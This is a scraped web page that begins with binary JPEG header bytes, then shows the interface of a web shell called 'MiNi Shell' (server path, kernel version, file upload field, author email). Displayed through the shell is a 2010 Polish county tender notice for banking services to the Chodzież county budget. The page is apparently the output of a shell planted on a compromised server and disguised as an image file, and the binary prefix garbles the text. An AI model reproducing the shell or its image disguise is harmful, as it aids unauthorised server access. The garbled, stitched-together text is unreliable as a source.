JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/284951-N-2010.html

<p class="kh_header"><b>Chodzież: Kompleksowa bankowa obsługa budżetu Powiatu Chodzieskiego</b><br>
<b>Numer ogłoszenia: 284951 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Chodzieży , ul. Wiosny Ludów 1, 64-800 Chodzież, woj. wielkopolskie, tel. 67 282 72 64, faks 67 281 27 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-chodzieski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa bankowa obsługa budżetu Powiatu Chodzieskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa bankowa obsługa budżetu Powiatu Chodzieskiego
1.Otwarcie i prowadzenie na jednolitych zasadach rachunków podstawowych i pomocniczych należących do:
     a)  budżetu Powiatu Chodzieskiego,
     b)  jednostek organizacyjnych, inspekcji i straży, podległych Powiatowi:
Starostwa Powiatowego w Chodzieży,
Domu Pomocy Społecznej w Chodzieży,
I  Liceum Ogólnokształcącego w Chodzieży,
Zespołu Szkół Ponadgimnazjalnych w Chodzieży,
Zespołu Szkół Licealno- Gimnazjalnych w Ratajach,
Wielofunkcyjnej Placówki Opiekuńczo-Wychowawczej RODZINA w Studzieńcu,
Poradni Psychologiczno- Pedagogicznej w Chodzieży,
Młodzieżowego Domu Kultury w Chodzieży,
Powiatowego Zarządu Dróg w Chodzieży z siedzibą w Milczu,
Powiatowego Urzędu Pracy w Chodzieży,
Centrum Edukacji Zawodowej w Chodzieży,
Powiatowego Centrum Pomocy Rodzinie w Chodzieży,
Powiatowego Inspektoratu Nadzoru Budowlanego w Chodzieży,
Komendy Powiatowej Państwowej Straży Pożarnej w Chodzieży,
Domu Dziecka w Szamocinie.
2) Otwarcie i prowadzenie rachunków podstawowych i pomocniczych dla innych jednostek, 
w przypadku łączenia, przekształcania, tworzenia lub przejęcia przez Powiat w czasie obowiązywania umowy,
3) Realizacja przelewów w ramach banku obsługującego Powiat oraz do innych banków, 
w tym możliwość składania przynajmniej do godziny 15.00 poleceń przelewu do innych banków, których realizacja (tzn. obciążenie odpowiedniego rachunku Zamawiającego kwotą zleconego przelewu) nastąpi w tym samym dniu,
4)  Przyjmowanie wpłat gotówkowych, 
5) Realizowanie wypłat gotówkowych, w tym możliwość natychmiastowej wypłaty gotówkowej, 
w godzinach pracy banku, do kwoty 5.000,00 zł,
6) Wdrożenie i świadczenie usług bankowości elektronicznej, w ramach których Zamawiający będzie miał zapewnione w szczególności:
a)instalację programu w siedzibach jednostek wraz z przeszkoleniem wskazanych       
 pracowników (na dowolnej ilości stanowisk) oraz świadczeniem serwisu 	oprogramowania,
b)uzyskiwanie w czasie rzeczywistym wiadomości o operacjach i saldach na 	rachunkach, 
c)tworzenie zbiorów danych rachunków, kontrahentów i innych danych ewidencyjnych,
d)przeszukiwanie zbiorów operacji na rachunkach wg rodzaju operacji, nazwy 	kontrahenta, daty, okresu, kwoty i innych możliwych do wyodrębnienia 	kryteriów, 
e)wykonywanie przelewów z przyszłą datą realizacji,
f)uzyskiwanie raportów o zrealizowanych operacjach,
g)generowanie (wydruk) e-wyciągów nie wymagających stempla bankowego,
h)potwierdzenie zrealizowania przelewu w systemie on-line, 
i)przechowywanie wysłanych przelewów i wyciągów w archiwum systemu, 	zgodnie z obowiązującymi przepisami, 
j)umożliwienie Zamawiającemu biernego wglądu na wszystkie rachunki bankowe 	podległych jednostek organizacyjnych, natomiast poszczególne jednostki będą 	miały dostęp jedynie do swoich rachunków, 
k)nadawanie różnego zakresu uprawnień wskazanym imiennie użytkownikom 	systemu elektronicznego w dowolnym momencie obowiązywania umowy, 	zmiana tych uprawnień poprzez wydanie dyspozycji.
7) W przypadku awarii systemu bankowości elektronicznej - możliwość realizowania usług bankowych na warunkach, jak dla usług realizowanych drogą elektroniczną,
8) Automatyczne deponowanie środków codziennego salda po godz. 16.00 - założenie lokaty typu overnight lub weekendowej na rachunkach budżetu powiatu, wraz z potwierdzeniem dokonanych operacji bankowych poprzez wyciągi z założonych lokat, z wyjątkiem dnia 
31 grudnia, w którym środki zgromadzone na rachunkach muszą pozostawać w dyspozycji Zamawiającego, 
 9) Pobieranie jednakowych opłat za świadczone usługi bankowe,
10) Stosowanie jednakowego oprocentowania środków na rachunkach bankowych (podstawowych i pomocniczych) budżetu powiatu i podległych jednostek, z wyjątkiem nieoprocentowanych rachunków (0%) służących do obsługi programów/projektów z udziałem środków pochodzących z budżetu Unii Europejskiej (wskazanych przez Zamawiającego), 
11) Naliczanie i kapitalizowanie odsetek od środków zgromadzonych na oprocentowanych rachunkach bankowych w okresach miesięcznych (w ostatnim dniu miesiąca) 
wraz z przekazywaniem wygenerowanych odsetek zgodnie z dyspozycjami - na rachunki wskazane przez Zamawiającego, 
12) Na wniosek Zamawiającego - sporządzanie dokumentów: zaświadczenia o posiadaniu rachunku bankowego, historii rachunku, opinii bankowej. 
13) Świadczenie innych usług zaoferowanych w złożonej przez Bank w ofercie, dla wszystkich jednostek na jednolitych zasadach,
14) Wykonywanie na zlecenie Zamawiającego innych czynności bankowych, wymienionych 
w ustawie Prawo bankowe,
15) Założenie i powiadomienie Zamawiającego o numerach rachunków bankowych najpóźniej 
do dnia 25 listopada 2010 roku, celem przekazania informacji do odpowiednich podmiotów,
16)Na wniosek Zamawiającego - uruchomienie kredytu krótkoterminowego w rachunku bieżącym budżetu Powiatu do corocznie określonego limitu (wynikającego z upoważnienia Rady Powiatu Chodzieskiego zawartego w uchwale budżetowej), z uwzględnieniem przepisów ustawy o finansach publicznych i Prawa bankowego.
	17) Bank musi tak skalkulować prowizje i opłaty, aby nie uległy zmianom w trakcie trwania umowy.
	18) Zamawiający zastrzega sobie prawo lokowania wolnych środków finansowych w innych bankach.
	19) Zamawiający wyraża zgodę na badanie zdolności kredytowej w każdym roku budżetowym 
przed udzieleniem kredytu krótkoterminowego w rachunku bieżącym budżetu powiatu, 
na podstawie przedłożonych sprawozdań budżetowych. Kwota kredytu krótkoterminowego 
w rachunku bieżącym budżetu Powiatu, wynikała będzie z upoważnienia Rady Powiatu Chodzieskiego, zawartego w uchwale budżetowej, dostarczanej corocznie przez Zamawiającego.
	20) W okresie obowiązywania umowy Bank powinien posiadać oddział, filię lub punkt na 	terenie miasta Chodzieży i miasta Szamocin (obsługa Domu Dziecka), w przeciwnym wypadku - zapewnić realizację przedmiotu zamówienia na zasadzie umowy współpracy (porozumienia) z innym bankiem (mającym oddział, filię lub punkt na terenie miasta Chodzieży 	i miasta Szamocin), bez ponoszenia dodatkowych kosztów przez Powiat. 
Zamawiający dopuszcza możliwość prowadzenia obsługi bankowej bez posiadania filii/oddziałów na terenie miasta Chodzieży i miasta Szamocin oraz bez umowy współpracy z innym bankiem, pod warunkiem, że zostanie zapewniona realizacja przedmiotu zamówienia zgodnie ze wszystkimi pozostałymi warunkami określonymi w SIWZ, w tym też z zapewnieniem,że realizacja ta nie będzie powodowała konieczności ponoszenia dodatkowych kosztów przez Powiat. W związku z powyższym brak ww umowy/porozumienia może zostać zastąpiony innym optymalnym rozwiązaniem, zaproponowanym przez Bank, pod warunkiem że zostanie zapewniona realizacja przedmiotu zamówienia zgodnie ze wszystkimi warunkami określonymi w SIWZ (oraz bez ponoszenia dodatkowych kosztów przez Powiat).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 	Prawa zamówień publicznych-  Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 	Prawa zamówień publicznych-  Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 	Prawa zamówień publicznych-  Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (dokumenty potwierdzające posiadane uprawnienia - kopie zaświadczeń o uprawnieniach zawodowych, dyplomów, certyfikatów), załącznik nr 3,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 	Prawa zamówień publicznych-  Załącznik nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przygotowany przez bank składający ofertę projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - oprocentowanieśrodków na rachunku - 20</li>
<li>3 - oprocentowanie depozytów- lokaty overnight - 30</li>
<li>4 - koszt kredytu krótkoterminowego - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wokiss.pl/chodziezp/bip/ogloszenia/zamowienia-publiczne.html w Dziale: Ogłoszenia / zamów<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
Ulica: Wiosny Ludów 1
64-800 Chodzież.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2010 godzina 10:00, miejsce: Starostwo Powiatowe
Ulica: Wiosny Ludów 1
64-800 Chodzież
Kancelaria (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.11.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com